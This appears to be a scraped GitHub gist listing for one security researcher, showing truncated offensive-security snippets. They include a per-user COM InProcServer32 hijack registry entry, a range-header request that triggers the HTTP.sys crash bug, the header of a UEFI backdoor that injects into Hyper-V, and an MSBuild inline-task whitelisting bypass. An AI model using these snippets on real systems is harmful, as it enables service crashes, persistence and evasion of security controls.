hybriz

Keybase proof

I hereby claim:

• I am hybriz on github.
• I am hybriz (https://keybase.io/hybriz) on keybase.
• I have a public key whose fingerprint is B551 1C31 3D1C 7273 7597 A18C 2A56 BF63 EBCF 54E8

To claim this, I am signing this object:

hybriz

curl -s https://api.github.com/orgs/twitter/repos?per_page=200 | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| %x[git clone #{repo["ssh_url"]} ]}'

hybriz

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"

hybriz

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

• Like popping alerts in weird situations
• Miss CSS expressions as much as we do
• Have an unhealthy obsession for markup porn

Introduction

hybriz

$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d  = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
$s2.Delete()
Remove-Item -Path C:\scpy -Force
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force

hybriz

powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}

hybriz

/* http://redd.it/2zna5q
 * Fibonacci example:
 *     (1) (2) +
 *     0:0
 *     1:1
 *     20
 */
#define _BSD_SOURCE  // MAP_ANONYMOUS
#include <stdio.h>
#include <stdlib.h>

hybriz

/*
 *********************************************************************

  Part of UEFI DXE driver code that injects Hyper-V VM exit handler
  backdoor into the Device Guard enabled Windows 10 Enterprise.
  
  Execution starts from new_ExitBootServices() -- a hook handler 
  for EFI_BOOT_SERVICES.ExitBootServices() which being called by
  winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
  transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)

hybriz

# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
    param (
        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('FullName')]
        [String]
        [ValidateNotNullOrEmpty()]

hybriz

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <PropertyGroup>
      <FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
      <Cmd Condition="'$(Cmd)' == ''">None</Cmd>
    </PropertyGroup>
  <Target Name="Hello">